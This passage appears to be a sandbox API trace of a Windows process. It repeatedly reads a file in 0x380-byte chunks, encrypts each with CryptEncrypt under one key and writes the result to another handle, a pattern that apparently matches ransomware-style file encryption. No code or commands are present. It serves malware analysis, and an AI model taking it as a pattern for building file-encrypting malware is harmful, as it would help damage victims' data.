lpOverlapped=0x0) returned 1 [0265.396] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.396] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.397] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.398] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.398] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.399] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.399] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.400] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.400] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0265.401] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0265.401] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: 